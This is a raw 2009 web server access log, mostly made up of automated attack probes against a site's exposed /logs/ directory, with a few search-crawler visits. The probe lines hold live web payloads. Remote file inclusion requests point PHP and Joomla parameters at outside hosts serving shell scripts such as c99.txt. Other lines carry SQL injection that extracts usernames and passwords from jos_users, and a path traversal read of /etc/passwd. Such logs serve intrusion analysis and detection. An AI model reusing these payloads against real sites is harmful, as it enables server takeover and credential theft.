80.237.154.69 - - [25/Jun/2009:22:08:56 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
80.237.154.69 - - [25/Jun/2009:22:08:56 -0500] "GET /logs/access_log.1233187200//config/dbutil.bck.php?confdir=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
80.237.154.69 - - [25/Jun/2009:22:08:59 -0500] "GET /logs/access_log.1233187200//config/dbutil.bck.php?confdir=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
80.237.154.69 - - [25/Jun/2009:22:08:59 -0500] "GET //config/dbutil.bck.php?confdir=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
80.237.154.69 - - [25/Jun/2009:22:08:59 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
80.237.154.69 - - [25/Jun/2009:22:09:15 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
80.237.154.69 - - [25/Jun/2009:22:09:22 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
80.237.154.69 - - [25/Jun/2009:22:09:33 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
93.174.137.184 - - [25/Jun/2009:22:13:44 -0500] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://kuettner.it/yes.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.826"
93.174.137.184 - - [25/Jun/2009:22:13:44 -0500] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://kuettner.it/yes.txt??? HTTP/1.1" 404 354 "-""libwww-perl/5.826"
63.223.114.28 - - [25/Jun/2009:22:18:14 -0500] "GET /logs/access_log.1229126400//errors.php?error=http://birdsmoney.asikbelanja.com/admin/web/include/CLASS/idxx.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
74.223.143.131 - - [25/Jun/2009:22:21:36 -0500] "GET /index.php?option=com_pcchess&Itemid=61&page=players&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/* HTTP/1.1" 404 292 "-""libwww-perl/5.79"
74.223.143.131 - - [25/Jun/2009:22:21:36 -0500] "GET /logs/access_log.1240012800/index.php?option=com_pcchess&Itemid=61&page=players&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/* HTTP/1.1" 404 319 "-""libwww-perl/5.79"
74.223.143.131 - - [25/Jun/2009:22:21:36 -0500] "GET /logs/index.php?option=com_pcchess&Itemid=61&page=players&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/* HTTP/1.1" 404 297 "-""libwww-perl/5.79"
74.223.143.131 - - [25/Jun/2009:22:21:36 -0500] "GET /logs/access_log.1240617600/index.php?option=com_pcchess&Itemid=61&page=players&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/* HTTP/1.1" 404 319 "-""libwww-perl/5.79"
216.17.99.13 - - [25/Jun/2009:22:21:37 -0500] "GET //pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.maerkischepolster.de/images/lib/idfx1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
216.17.99.13 - - [25/Jun/2009:22:21:37 -0500] "GET /logs//pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.maerkischepolster.de/images/lib/idfx1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
216.17.99.13 - - [25/Jun/2009:22:21:37 -0500] "GET /logs/access_log.1228694400%20%20//pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.maerkischepolster.de/images/lib/idfx1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
74.223.143.131 - - [25/Jun/2009:22:22:05 -0500] "GET /logs/access_log.1240012800/index.php?option=com_pcchess&Itemid=61&page=players&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/* HTTP/1.1" 404 319 "-""libwww-perl/5.79"
74.223.143.131 - - [25/Jun/2009:22:22:05 -0500] "GET /index.php?option=com_pcchess&Itemid=61&page=players&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/* HTTP/1.1" 404 292 "-""libwww-perl/5.79"
74.223.143.131 - - [25/Jun/2009:22:22:05 -0500] "GET /logs/index.php?option=com_pcchess&Itemid=61&page=players&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/* HTTP/1.1" 404 297 "-""libwww-perl/5.79"
74.223.143.131 - - [25/Jun/2009:22:22:06 -0500] "GET /logs/access_log.1240617600/index.php?option=com_pcchess&Itemid=61&page=players&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/* HTTP/1.1" 404 319 "-""libwww-perl/5.79"
124.0.139.129 - - [25/Jun/2009:22:22:56 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
124.0.139.129 - - [25/Jun/2009:22:22:56 -0500] "GET /logs/access_log.1239321600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
124.0.139.129 - - [25/Jun/2009:22:22:56 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
124.0.139.129 - - [25/Jun/2009:22:23:50 -0500] "GET /logs/access_log.1239926400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
83.16.182.130 - - [25/Jun/2009:22:26:06 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
83.16.182.130 - - [25/Jun/2009:22:26:06 -0500] "GET /logs/access_log.1242000000/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
83.16.182.130 - - [25/Jun/2009:22:26:06 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
83.16.182.130 - - [25/Jun/2009:22:27:38 -0500] "GET /logs/access_log.1240358400/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
82.194.87.219 - - [25/Jun/2009:22:30:40 -0500] "GET /logs///include/mail.inc.php?skin_board_path=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 310 "-""libwww-perl/5.822"
65.55.106.218 - - [25/Jun/2009:22:34:55 -0500] "GET /logs/access_log.1159315200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
83.16.182.130 - - [25/Jun/2009:22:35:49 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
83.16.182.130 - - [25/Jun/2009:22:35:49 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
83.16.182.130 - - [25/Jun/2009:22:35:49 -0500] "GET /logs/access_log.1242000000/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
74.223.143.131 - - [25/Jun/2009:22:36:08 -0500] "GET /logs/access_log.1238371200/index.php?option=com_pcchess&Itemid=61&page=players&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/* HTTP/1.1" 404 319 "-""libwww-perl/5.79"
83.16.182.130 - - [25/Jun/2009:22:37:22 -0500] "GET /logs/access_log.1240358400/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
74.223.143.131 - - [25/Jun/2009:22:38:49 -0500] "GET /logs/access_log.1238371200/index.php?option=com_pcchess&Itemid=61&page=players&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/* HTTP/1.1" 404 319 "-""libwww-perl/5.79"
89.108.64.88 - - [25/Jun/2009:22:39:45 -0500] "GET /logs/?mosConfig_absolute_path=http://www.peb.com.ua/ua/left.txt??? HTTP/1.1" 200 194785 "-""libwww-perl/5.812"
89.108.64.88 - - [25/Jun/2009:22:39:45 -0500] "GET /?mosConfig_absolute_path=http://www.peb.com.ua/ua/left.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.812"
65.55.208.118 - - [25/Jun/2009:22:46:22 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.118 - - [25/Jun/2009:22:46:23 -0500] "GET /logs/access_log.1186963200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.118 - - [25/Jun/2009:22:46:23 -0500] "GET /logs/access_log.1184716800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.118 - - [25/Jun/2009:22:46:23 -0500] "GET /logs/access_log.1138060800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.118 - - [25/Jun/2009:22:46:24 -0500] "GET /logs/access_log.1180483200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.118 - - [25/Jun/2009:22:46:24 -0500] "GET /logs/access_log.1139270400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.106.138 - - [25/Jun/2009:22:51:25 -0500] "GET /logs/access_log.1178928000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
77.221.130.17 - - [25/Jun/2009:22:59:15 -0500] "GET //include/mail.inc.php?skin_board_path=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 304 "-""Mozilla/5.0"
77.221.130.17 - - [25/Jun/2009:22:59:15 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 309 "-""Mozilla/5.0"
77.221.130.17 - - [25/Jun/2009:22:59:15 -0500] "GET /logs/access_log.1240531200//include/mail.inc.php?skin_board_path=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 331 "-""Mozilla/5.0"
216.17.99.13 - - [25/Jun/2009:23:03:45 -0500] "GET /logs/access_log.1228608000//pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.maerkischepolster.de/images/lib/idfx1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
83.16.182.130 - - [25/Jun/2009:23:20:25 -0500] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
83.16.182.130 - - [25/Jun/2009:23:20:25 -0500] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
83.16.182.130 - - [25/Jun/2009:23:20:25 -0500] "GET /logs/access_log.1240358400/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 383 "-""Mozilla/5.0"
83.16.182.130 - - [25/Jun/2009:23:20:33 -0500] "GET /logs/access_log.1239926400/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 383 "-""Mozilla/5.0"
200.175.202.106 - - [25/Jun/2009:23:21:28 -0500] "GET /logs/index2.php?x=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
200.175.202.106 - - [25/Jun/2009:23:21:28 -0500] "GET /index2.php?x=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
69.50.194.181 - - [25/Jun/2009:23:31:00 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
69.50.194.181 - - [25/Jun/2009:23:31:00 -0500] "GET //include/mail.inc.php?skin_board_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
69.50.194.181 - - [25/Jun/2009:23:31:00 -0500] "GET /logs/access_log.1233705600//include/mail.inc.php?skin_board_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
69.50.194.181 - - [25/Jun/2009:23:31:13 -0500] "GET /logs/access_log.1242000000//include/mail.inc.php?skin_board_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
84.51.241.6 - - [25/Jun/2009:23:31:16 -0500] "GET /logs/access_log.1233705600//include/mail.inc.php?skin_board_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
84.51.241.6 - - [25/Jun/2009:23:31:16 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
84.51.241.6 - - [25/Jun/2009:23:31:16 -0500] "GET //include/mail.inc.php?skin_board_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
84.51.241.6 - - [25/Jun/2009:23:31:29 -0500] "GET /logs/access_log.1242000000//include/mail.inc.php?skin_board_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
83.98.209.71 - - [25/Jun/2009:23:44:36 -0500] "GET /error.php?dir=http://aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
83.98.209.71 - - [25/Jun/2009:23:44:36 -0500] "GET /logs/error.php?dir=http://aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
83.16.182.130 - - [25/Jun/2009:23:45:24 -0500] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
83.16.182.130 - - [25/Jun/2009:23:45:24 -0500] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
83.16.182.130 - - [25/Jun/2009:23:45:24 -0500] "GET /logs/access_log.1240358400/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 383 "-""Mozilla/5.0"
83.16.182.130 - - [25/Jun/2009:23:45:32 -0500] "GET /logs/access_log.1239926400/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 383 "-""Mozilla/5.0"
65.55.106.161 - - [25/Jun/2009:23:46:58 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.17.99.13 - - [25/Jun/2009:23:49:40 -0500] "GET /logs/access_log.1230076800//pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.maerkischepolster.de/images/lib/idfx1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
65.55.106.161 - - [25/Jun/2009:23:52:25 -0500] "GET /logs/access_log.1182038400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.17.99.13 - - [25/Jun/2009:23:55:36 -0500] "GET /logs/access_log.1235347200//pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.maerkischepolster.de/images/lib/idfx1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
216.17.99.13 - - [25/Jun/2009:23:56:02 -0500] "GET /logs/access_log.1234137600//pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.maerkischepolster.de/images/lib/idfx1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
210.66.69.167 - - [25/Jun/2009:23:56:59 -0500] "GET /robots.txt HTTP/1.0" 404 281 "-""Gaisbot/3.0+(robot06@gais.cs.ccu.edu.tw;+http://gais.cs.ccu.edu.tw/robot.php)"
216.17.99.13 - - [25/Jun/2009:23:59:06 -0500] "GET /logs/access_log.1236038400//pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.maerkischepolster.de/images/lib/idfx1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:00:00:01 -0500] "GET /logs/access_log.1232236800//pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.maerkischepolster.de/images/lib/idfx1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:00:02:49 -0500] "GET /logs/access_log.1227657600//pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.maerkischepolster.de/images/lib/idfx1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
65.55.106.244 - - [26/Jun/2009:00:02:57 -0500] "GET /logs/access_log.1196380800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.17.99.13 - - [26/Jun/2009:00:04:32 -0500] "GET /logs/access_log.1235865600//pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.maerkischepolster.de/images/lib/idfx1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:00:04:53 -0500] "GET /logs/access_log.1233705600//pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.maerkischepolster.de/images/lib/idfx1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:00:05:04 -0500] "GET /logs/access_log.1236211200//pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.maerkischepolster.de/images/lib/idfx1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:00:05:14 -0500] "GET /logs/access_log.1228435200//pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.maerkischepolster.de/images/lib/idfx1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:00:05:19 -0500] "GET /logs/access_log.1234224000//pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.maerkischepolster.de/images/lib/idfx1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:00:05:19 -0500] "GET /logs/access_log.1235260800//pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.maerkischepolster.de/images/lib/idfx1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:00:05:19 -0500] "GET /logs/access_log.1228348800//pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.maerkischepolster.de/images/lib/idfx1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:00:05:19 -0500] "GET /logs/access_log.1231891200//pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.maerkischepolster.de/images/lib/idfx1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:00:05:19 -0500] "GET /logs/access_log.1228262400//pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.maerkischepolster.de/images/lib/idfx1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:00:05:37 -0500] "GET /logs/access_log.1227744000//pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.maerkischepolster.de/images/lib/idfx1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:00:05:37 -0500] "GET /logs/access_log.1233014400//pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.maerkischepolster.de/images/lib/idfx1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:00:05:51 -0500] "GET /logs/access_log.1233273600//pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.maerkischepolster.de/images/lib/idfx1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
200.175.202.106 - - [26/Jun/2009:00:05:59 -0500] "GET //convert/mvcw.php?vwar_root=http://www.hackerlar.net/c99.txt???? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
200.175.202.106 - - [26/Jun/2009:00:05:59 -0500] "GET /logs//convert/mvcw.php?vwar_root=http://www.hackerlar.net/c99.txt???? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
216.17.99.13 - - [26/Jun/2009:00:06:25 -0500] "GET /logs/access_log.1235433600//pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.maerkischepolster.de/images/lib/idfx1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:00:06:37 -0500] "GET /logs/access_log.1233100800//pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.maerkischepolster.de/images/lib/idfx1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:00:06:49 -0500] "GET /logs/access_log.1231804800//pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.maerkischepolster.de/images/lib/idfx1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:00:15:02 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:00:15:02 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:00:15:02 -0500] "GET /logs/access_log.1239667200/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:00:15:29 -0500] "GET /logs/access_log.1237248000/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
123.143.98.5 - - [26/Jun/2009:00:16:17 -0500] "GET /logs/access_log.1239408000//?path%5Bdocroot%5D=http://saengcho.hs.kr//bbs/include/etel.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
123.143.98.5 - - [26/Jun/2009:00:16:17 -0500] "GET //?path%5Bdocroot%5D=http://saengcho.hs.kr//bbs/include/etel.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
123.143.98.5 - - [26/Jun/2009:00:16:24 -0500] "GET /logs//?path%5Bdocroot%5D=http://saengcho.hs.kr//bbs/include/etel.txt?? HTTP/1.1" 200 36689 "-""Mozilla/5.0"
123.143.98.5 - - [26/Jun/2009:00:16:42 -0500] "GET //?path%5Bdocroot%5D=http://saengcho.hs.kr//bbs/include/etel.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
123.143.98.5 - - [26/Jun/2009:00:16:42 -0500] "GET /logs/access_log.1239408000//?path%5Bdocroot%5D=http://saengcho.hs.kr//bbs/include/etel.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
123.143.98.5 - - [26/Jun/2009:00:16:44 -0500] "GET /logs//?path%5Bdocroot%5D=http://saengcho.hs.kr//bbs/include/etel.txt?? HTTP/1.1" 200 194790 "-""Mozilla/5.0"
123.143.98.5 - - [26/Jun/2009:00:17:03 -0500] "GET /logs/access_log.1241740800//?path%5Bdocroot%5D=http://saengcho.hs.kr//bbs/include/etel.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
123.143.98.5 - - [26/Jun/2009:00:17:10 -0500] "GET /logs/access_log.1241740800//?path%5Bdocroot%5D=http://saengcho.hs.kr//bbs/include/etel.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
65.55.106.228 - - [26/Jun/2009:00:25:25 -0500] "GET /logs/access_log.1197417600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
83.16.182.130 - - [26/Jun/2009:00:29:07 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:00:29:07 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:00:29:07 -0500] "GET /logs/access_log.1239667200/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:00:29:07 -0500] "GET /logs/access_log.1237248000/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
83.98.209.71 - - [26/Jun/2009:00:30:42 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
83.98.209.71 - - [26/Jun/2009:00:30:42 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 332 "-""libwww-perl/5.79"
70.38.31.50 - - [26/Jun/2009:00:31:07 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
70.38.31.50 - - [26/Jun/2009:00:31:07 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
70.38.31.50 - - [26/Jun/2009:00:31:07 -0500] "GET /logs/access_log.1240358400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
70.38.31.50 - - [26/Jun/2009:00:32:13 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
70.38.31.50 - - [26/Jun/2009:00:32:13 -0500] "GET /logs/access_log.1241740800//components/com_facileforms/facileforms.frame.php?ff_compath=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 359 "-""Mozilla/5.0"
70.38.31.50 - - [26/Jun/2009:00:32:13 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
70.38.31.50 - - [26/Jun/2009:00:32:24 -0500] "GET /logs/access_log.1242000000//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
66.249.68.42 - - [26/Jun/2009:00:40:25 -0500] "GET / HTTP/1.1" 200 3245 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
